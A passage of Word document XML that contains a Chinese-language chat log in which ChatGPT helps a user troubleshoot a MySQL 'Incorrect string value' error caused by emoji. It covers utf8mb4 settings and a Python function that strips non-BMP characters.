          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件格式不支持共享表空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956385F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBD6BF4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，更改这些变量的值可能会影响到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的性能和存储需求，所以在你确定这些更改对你的应用是安全的之前，请不要在生产环境中直接修改这些设置。如果你对此有任何疑问，你应该联系你的系统管理员或数据库管理员。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE34882" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0661670A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我已按照你的要求确认了你说的可能性，但是依然报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1366, "Incorrect string value: '\\xF0\\x9F\\xA4\\x96 A...' for column 'source' at row 1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAACDE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186B05E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3728D952" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你已经确认了你的数据库、表、列都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">innodb_large_prefix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> innodb_file_format </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置也正确，那么问题可能在于连接数据库的客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3525EA18" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A926341" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pymysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中，需要在连接数据库时设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。你之前已经做过这一步，但是仍然有问题，那么可能需要确认一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6617F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03071769" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种错误还可能由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身的字符编码问题引起。确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本文件的编码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。你可以在脚本的顶部添加以下代码来指定编码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219DB8E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7508AA35" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68769901" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8AEFB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBD9114" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，如果你正在使用的字符串是硬编码的，确保它们在源代码文件中正确地编码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52736117" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F608B5E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果还是不行，那么问题可能在于数据本身。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\\xF0\\x9F\\xA4\\x96 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个四字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，可能是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他特殊字符。可能需要进一步检查数据，看是否存在某种形式的损坏或误编码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF7116" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22322DF7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，一些数据库驱动程序或库可能存在一些缺陷或限制，导致他们不能正确地处理四字节字符。如果你使用的库有这样的问题，你可能需要寻找其他方法或库来解决你的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A0F74" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFD438" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个和存储字段是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无关吧？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D4495" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CD29B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F87348" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段类型为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TEXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该不会引起这个问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TEXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型可以存储最大长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 65,535 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的字符串，应该足够存储大多数字符串，包括包含四字节字符的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B4502" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E432BE1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是，如果你想在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TEXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段中存储超过此长度的字符串，你需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MEDIUMTEXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LONGTEXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，它们可以存储更长的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F71B87" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE7B3C7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>错误信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1366, "Incorrect string value: '\\xF0\\x9F\\xA4\\x96 A...' for column 'source' at row 1") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是由于试图将四字节字符存储在不支持四字节字符的字符集中。这个问题通常可以通过将字符集更改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来解决，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的超集，支持四字节字符，包括大多数表情符号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8B9CE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292CC584" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你的数据库，表和列都已经设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集，那么问题可能在于客户端或驱动程序。请确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端和驱动程序也支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pymysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中，你可以在创建连接时设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset='utf8mb4' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现这一点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A21CD7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27392D50" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能不能让我的程序将这种非常规的字符替换为空？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C1B4C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35000628" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF8F450" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块（正则表达式）来处理这种问题，移除或替换掉非法的、不能解析的字符。以下是一个基本的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C17B5A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA600D0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A1297" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27FB67" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE48260" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def remove_non_bmp_characters(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A5C31" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F89F0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Removes non-BMP (not Basic Multilingual Plane) characters from a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B7043" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4E9D66" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bmp_chars = ''.join(c for c in data if c &lt;= '\uFFFF')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F90A7A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return bmp_chars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113BB8C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0E9970" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你获取数据后，清理它：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642144A3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>data = "your data here with some bad characters..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B531C9F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cleaned_data = remove_non_bmp_characters(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7DDFD1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E005008" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码的作用是移除所有不在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（基本多语言平面）内的字符。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外的字符需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B2D88" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
